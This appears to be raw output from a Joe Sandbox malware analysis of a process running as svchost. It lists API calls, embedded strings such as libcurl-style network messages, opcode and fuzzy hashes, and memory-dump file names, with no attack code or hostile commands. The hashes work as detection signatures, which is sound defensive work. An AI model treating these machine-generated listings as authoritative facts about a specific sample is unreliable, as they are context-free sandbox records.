                                                                                                                                                                                • Opcode ID: b80d3fe827af3b92b47c01d57aa46a1541a627d0a2307fdfeb692f30fb3d5a09
                                                                                                                                                                                • Instruction ID: 87cb1f33d22d24e49e71fa9a83c9010f4fe1c7d669af90c54f1cf5c7a49133d6
                                                                                                                                                                                • Opcode Fuzzy Hash: b80d3fe827af3b92b47c01d57aa46a1541a627d0a2307fdfeb692f30fb3d5a09
                                                                                                                                                                                • Instruction Fuzzy Hash: E6416E36A0878282EB54CF29E854B79ABA1EB48BD8F088131DF9D07695CFBDD452C744
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateEventcalloc
                                                                                                                                                                                • String ID: a$d
                                                                                                                                                                                • API String ID: 2382962142-224607458
                                                                                                                                                                                • Opcode ID: 8f64313724adfd49e7e8504fb6ffcb3eda40a5ddaaf5f253bd2d46a713979e4c
                                                                                                                                                                                • Instruction ID: 7761d1b41936e1751b42ca99ce71639ac2ce071c20fffb3b7cae8e06c8756b00
                                                                                                                                                                                • Opcode Fuzzy Hash: 8f64313724adfd49e7e8504fb6ffcb3eda40a5ddaaf5f253bd2d46a713979e4c
                                                                                                                                                                                • Instruction Fuzzy Hash: 99411D31A18A8282EB40DF28D4512F973A5FF9CB88F880435DB4E4669AEF3CD556C714
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: NameName::
                                                                                                                                                                                • String ID: `template-parameter$void
                                                                                                                                                                                • API String ID: 1333004437-4057429177
                                                                                                                                                                                • Opcode ID: f5b4d1eb75f0a8e48634f0c3fda8f1eef644c2320586a38af0c725e887692c29
                                                                                                                                                                                • Instruction ID: bc34397ab82b50818e98f451391a2a9b3034107feefd40cca63728555ec0536c
                                                                                                                                                                                • Opcode Fuzzy Hash: f5b4d1eb75f0a8e48634f0c3fda8f1eef644c2320586a38af0c725e887692c29
                                                                                                                                                                                • Instruction Fuzzy Hash: 79416922F0AB46A8FB119FB0D8512EC23B1FB487C8F944136DE0C17A99EF78A645D300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=
                                                                                                                                                                                • String ID: %s: %s$Expire Date$FALSE$Failed extracting certificate chain
                                                                                                                                                                                • API String ID: 356670603-1145006616
                                                                                                                                                                                • Opcode ID: 888e71b473a08be71fee3fc31bb9be3f6efaaaf1701f6653c01a7083255c7bd4
                                                                                                                                                                                • Instruction ID: c6bb6918b781ae56513bed4018dddbb8229a90feed0d5af5a7115833755fb34b
                                                                                                                                                                                • Opcode Fuzzy Hash: 888e71b473a08be71fee3fc31bb9be3f6efaaaf1701f6653c01a7083255c7bd4
                                                                                                                                                                                • Instruction Fuzzy Hash: 47218C25A08787C1EA619B1EA8506FA7790BB4C7C8F880032DF4D57696DF3CE54ACB48
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                • String ID: Negative precision.$Number is too big.
                                                                                                                                                                                • API String ID: 3237623162-3993994484
                                                                                                                                                                                • Opcode ID: a74ef02e91efde32acadcf359c838e03229e8a19eac0b1fb87246416be8cbcf9
                                                                                                                                                                                • Instruction ID: 4cdc2acb783f8f0c417c4aadb7d73416f083fa3a21a257df89e44d4de1805e5f
                                                                                                                                                                                • Opcode Fuzzy Hash: a74ef02e91efde32acadcf359c838e03229e8a19eac0b1fb87246416be8cbcf9
                                                                                                                                                                                • Instruction Fuzzy Hash: 8121793250E2876FE309EF3C84AA5BD7B68EF11B84F648C36D79842487DD5E6254F206
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: getenv
                                                                                                                                                                                • String ID: LANG$LC_ALL
                                                                                                                                                                                • API String ID: 498649692-1846429067
                                                                                                                                                                                • Opcode ID: 20105158b568c463e689491634bbafff3b6ecea8656e57f883d36d48775a029e
                                                                                                                                                                                • Instruction ID: 9fcd8caaeaea0ee29bcae651b0bc62379cbade15344a2b039fa1b902524f3055
                                                                                                                                                                                • Opcode Fuzzy Hash: 20105158b568c463e689491634bbafff3b6ecea8656e57f883d36d48775a029e
                                                                                                                                                                                • Instruction Fuzzy Hash: 1EE0129A74A34E5AFF56C726A95032516624B45755FCC4821C9BD067D0EB3CDCD4C320
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: Cannot pause RTP$Cannot write a 0 size RTP packet.$Failed writing RTP data$RTSP/
                                                                                                                                                                                • API String ID: 1294909896-1718906258
                                                                                                                                                                                • Opcode ID: 63d40df758a571eb44bbd87b5d3905f2f93546faecdd4432d4c39d112b728982
                                                                                                                                                                                • Instruction ID: 5f900dc85e8def47f3427b72fb9daa822fe00d2cc48816204dcf412c0492353c
                                                                                                                                                                                • Opcode Fuzzy Hash: 63d40df758a571eb44bbd87b5d3905f2f93546faecdd4432d4c39d112b728982
                                                                                                                                                                                • Instruction Fuzzy Hash: DCC17F21B0D68A86FA688A2A8D807BD6690BB4DBC4F0C4135DF1E57785DF7DE492C308
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memchr
                                                                                                                                                                                • String ID: *$Failed to parse FETCH response.$Found %lld bytes to download$Written %zu bytes, %llu bytes are left for transfer
                                                                                                                                                                                • API String ID: 3297308162-2609606168
                                                                                                                                                                                • Opcode ID: 33e05b148de8a605a595cb28624cda25e2c3745183740257a21cc2d1e1a7ddac
                                                                                                                                                                                • Instruction ID: 6935113c0a9cd76fb803d1f0dd0bfe60c71bb6c075d2352f2bfa28aa9e202b72
                                                                                                                                                                                • Opcode Fuzzy Hash: 33e05b148de8a605a595cb28624cda25e2c3745183740257a21cc2d1e1a7ddac
                                                                                                                                                                                • Instruction Fuzzy Hash: 4E51DF62B0D68285EA509B6EE9902FD6791EF89BE4F080431DF0D0B785DFBCF5928744
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: %s cannot be done over CONNECT$allocate connect buffer$connect
                                                                                                                                                                                • API String ID: 0-1385156461
                                                                                                                                                                                • Opcode ID: 5c4e6c3c2c226eb06814d5febb243e4c2839fd46f21cdd6ca3246c4667dde2df
                                                                                                                                                                                • Instruction ID: 5db197a68542d1ab7c54361fbdf2e51dcfaac2b5c1450839932e07f408fb9a6f
                                                                                                                                                                                • Opcode Fuzzy Hash: 5c4e6c3c2c226eb06814d5febb243e4c2839fd46f21cdd6ca3246c4667dde2df
                                                                                                                                                                                • Instruction Fuzzy Hash: 9851946170D78185FB24DB2E99503BAA6A1EB49BC4F0C4031DB4E07B96DF7DE446C345
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: callocfree
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 306872129-0
                                                                                                                                                                                • Opcode ID: c678f5ed1600a8b959c48394a6695923d33b67fef965bb8b888b8516cc0fb7c3
                                                                                                                                                                                • Instruction ID: 81c68f6c298a83acc504dbe97b0ee7a5c1189e3de407347d9941bca12694fe31
                                                                                                                                                                                • Opcode Fuzzy Hash: c678f5ed1600a8b959c48394a6695923d33b67fef965bb8b888b8516cc0fb7c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F714972505BC186E3518F38E8443DA36A4E749BB8F1C0339DAB90E3DADFB99085C725
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memmove$malloc
                                                                                                                                                                                • String ID: PLAIN
                                                                                                                                                                                • API String ID: 3263852767-4000620671
                                                                                                                                                                                • Opcode ID: 967a48d3ae3632e1988ab9beaee0ac203fce039a8a72d65b83397ebf9167eb9c
                                                                                                                                                                                • Instruction ID: 0aab8546ce5989bdb4194742dadd7993f874a0b83d0e0fddb387d3e4ed9fd7d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 967a48d3ae3632e1988ab9beaee0ac203fce039a8a72d65b83397ebf9167eb9c
                                                                                                                                                                                • Instruction Fuzzy Hash: 4731C5A2A0DAC649EA20CA19A54026ABB54EB49BF4F0D8731DF7E037C5DF3CD1438304
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: %s%s$@$Wildcard - "%s" skipped by user$Wildcard - START of "%s"
                                                                                                                                                                                • API String ID: 1294909896-2859655526
                                                                                                                                                                                • Opcode ID: c9855bddabc4a27cd9db9cb27dd5964cce61590c4f4873fbddeb9d07a878e6bf
                                                                                                                                                                                • Instruction ID: 670022e28a10d27d83f77aa42895a62291507467b98150a53788dc7d11139f7f
                                                                                                                                                                                • Opcode Fuzzy Hash: c9855bddabc4a27cd9db9cb27dd5964cce61590c4f4873fbddeb9d07a878e6bf
                                                                                                                                                                                • Instruction Fuzzy Hash: F5314165A0A64282FA55DB29D4602BD27A4FF4DBC4F084036DF4E47792DF3CE456C709
                                                                                                                                                                                APIs
                                                                                                                                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B8392C8E,?,?,?,?,?,?,?,?,?,?,00000000,00007FF8B8378569), ref: 00007FF8B83A7CD9
                                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B8392C8E,?,?,?,?,?,?,?,?,?,?,00000000,00007FF8B8378569), ref: 00007FF8B83A7CEC
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B8392C8E,?,?,?,?,?,?,?,?,?,?,00000000,00007FF8B8378569), ref: 00007FF8B83A7D00
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B8392C8E,?,?,?,?,?,?,?,?,?,?,00000000,00007FF8B8378569), ref: 00007FF8B83A7D77
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B8392C8E,?,?,?,?,?,?,?,?,?,?,00000000,00007FF8B8378569), ref: 00007FF8B83A7D83
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_strdupmalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 111713529-0
                                                                                                                                                                                • Opcode ID: a9c0dc68316c7c2622b13b135eb143925d15ef3191bfef8dad06cf21857c7b5a
                                                                                                                                                                                • Instruction ID: 907b1b9aeb0c8bda9dc024e27989982da17f6f296f07817f0433d53d97d03b26
                                                                                                                                                                                • Opcode Fuzzy Hash: a9c0dc68316c7c2622b13b135eb143925d15ef3191bfef8dad06cf21857c7b5a
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C21F82160AB82C1EE559F0AAA80238B6A4AF4CFD0F0D4435CF9D07B54DF7CE8528318
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32 ref: 6828C8A5
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 6828C8B0
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6828C8B9
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6828C8C1
                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32 ref: 6828C8CE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                • Opcode ID: 163e2e69cd60763563d8bbc24facd08ae0651081d2bf883fea85efff96d87309
                                                                                                                                                                                • Instruction ID: de8865f579cc78b3bd6f02289c46208b957763dd418be63745bf607111a9c14e
                                                                                                                                                                                • Opcode Fuzzy Hash: 163e2e69cd60763563d8bbc24facd08ae0651081d2bf883fea85efff96d87309
                                                                                                                                                                                • Instruction Fuzzy Hash: C1118F76215B4686FF514B2ABD1431572A2BB48BF5F449324DE9E437A4EF3DC498C300
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpystrlen$mallocstrcmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1163645620-0
                                                                                                                                                                                • Opcode ID: 64da88bf9260b151aac8c6f81679060b510848f8e31d7b2236f5d9245c18b42d
                                                                                                                                                                                • Instruction ID: 78d0bbc60d57bc15763a2f0dcd48f46f4ca574966e799e0e4afdd3eef464d75e
                                                                                                                                                                                • Opcode Fuzzy Hash: 64da88bf9260b151aac8c6f81679060b510848f8e31d7b2236f5d9245c18b42d
